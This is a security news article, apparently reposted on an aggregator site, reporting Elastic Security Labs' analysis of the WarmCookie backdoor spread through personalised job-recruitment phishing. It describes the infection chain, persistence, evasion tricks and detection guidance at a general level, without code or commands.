WarmCookie Gives Cyberattackers Tasty New Backdoor for Initial Access

  /     /     /  
Publicated : 23/11/2024   Category : security


WarmCookie Gives Cyberattackers Tasty New Backdoor for Initial Access


The fresh-baked malware is being widely distributed, but still specifically targets individuals with tailored lures. Its poised to evolve into a bigger threat, researchers warn.



A purpose-built Windows backdoor appears to be the new flavor of the month for giving attackers entry into targeted systems; after initial access, they pivot to ransomware delivery and system compromise in a wave of recent attacks.
Dubbed WarmCookie by researchers at Elastic Security Labs, the backdoor has been distributed widely in a spate of
phishing emails
starting in late April by a campaign called REF6127. It uses recruitment and potential jobs as lures, the researchers revealed in
a blog post
today.
While the malware itself isnt particularly sophisticated — its mainly an initial backdoor tool for scouting out victim networks and deploying additional payloads — it shouldnt be taken lightly as its actively being used and impacting organizations at a global scale, Daniel Stepanic, Elastic Security principal security research engineer, wrote in the post.
The backdoors code overlaps with a sample that was previously
reported by eSentire
, suggesting that WarmCookie may be an update to malware that already was in circulation since 2022. However, the latest version of the backdoor represents a different, more pervasive threat, Stepanic noted.
While some features are similar, such as the implementation of string obfuscation, WarmCookie contains differing functionality, he wrote. Our team is seeing this threat distributed daily with the use of recruiting and job themes targeting individuals.
Phishing lures that use
job recruitment
are a common theme for attackers, which have found success previously in targeting various professionals with fake promises of new employment positions.
North Korean APT Lazarus
is among attackers that has been particularly active with this tactic.
The emails in the REF6127 campaign put a twist on this with lures that are specific to the individuals that the attackers are targeting, the researchers said. Indeed, the campaign uses info about targets current employers attempt to lure them with a type of position that might pique their interest, enticing victims to pursue new job opportunities by clicking a link to an internal system to view a job description, Stepanic wrote.
In terms of the infection routine, one screenshot included in the post shows a message telling the recipient there is an exciting opportunity in the form of a new position open with one of the recruiters clients. The message includes a View Position Details link which eventually leads to the process for deploying WarmCookie.
If a target clicks on the link, it goes to a landing page that looks like a legitimate page specifically targeted for the intended victim using his or her name, and that prompts the user to download a document by solving a
CAPTCHA challenge
. The landing pages used in the campaign resemble previous campaigns
discovered by
Google Clouds security team in a campaign used to spread a new variant of the URSNIF malware, Stepanic noted.
Solving the CAPTCHA challenge downloads an obfuscated JavaScript file that runs PowerShell, kicking off the first task to load WarmCookie. The PowerShell script abuses the Background Intelligent Transfer Service (BITS) to download the malware and run the DLL with the Start export.
To keep defenders on their toes, attackers continuously generate new landing pages rapidly on IP address 45.9.74[.]135, targeting different recruiting firms in combination with keywords related to the job search industry with their malicious activity. Moreover, before hitting each landing page, the adversary distances itself by using compromised infrastructure to host the initial phishing URL, which redirects the different landing pages, Stepanic noted.
WarmCookie is a two-stage lightweight backdoor that ultimately provides relatively straightforward functionality — such as retrieving victim info and screenshot recording — for monitoring victims and further deploying more damaging payloads, such as ransomware, according to the post.
In the first stage, which occurs after the PowerShell download of the malware, the backdoor sets itself up to run with System privileges from the Task Scheduler Engine. A critical part of the infection chain comes from the scheduled task, which is set up at the very beginning of the infection, Stepanic noted. The task name (RtlUpd) is scheduled to run every 10 minutes every day.
The malwares second stage contains the
backdoors core functionality
and is one in which the DLL is combined with the command line (Start /p) to set execution in motion.
Along the way, WarmCookie uses several tactics to avoid detection. One is to protect its strings using a custom string decryption algorithm in which the first four bytes of each encrypted string in the .rdata section represent the size, the next four-bytes represent the RC4 key, and the remaining bytes represent the string, Stephanic wrote. Developers also made the interesting choice not always to rotate the RC4 key between the encrypted strings.
WarmCookie also uses
dynamic API loading
to prevent static analysis from identifying its core functionality, and includes a few anti-analysis checks commonly used to target sandboxes based on logic for checking the active number of CPU processors and physical/virtual memory values, he added.
Elastic is urging organizations to be on the lookout for WarmCookie, which will likely evolve over time as its developers enhance it with advanced functionality.
Our team believes this malware represents a formidable threat that provides the capability to access target environments and push additional types of malware down to victims, Stepanic wrote.
The post includes a screenshot of YARA rules that organizations use to identify the presence of WarmCookie in an environment. Elastic also specifically addresses various behavior of the
backdoor
— including its Powershell
download
and execution and
Scheduled Task
creation — to provide insight on how to detect this activity on an organizations network.

Last News

▸ Debunking Machine Learning in Security. ◂
Discovered: 23/12/2024
Category: security

▸ Researchers create BlackForest to gather, link threat data. ◂
Discovered: 23/12/2024
Category: security

▸ Travel agency fined £150,000 for breaking Data Protection Act. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
WarmCookie Gives Cyberattackers Tasty New Backdoor for Initial Access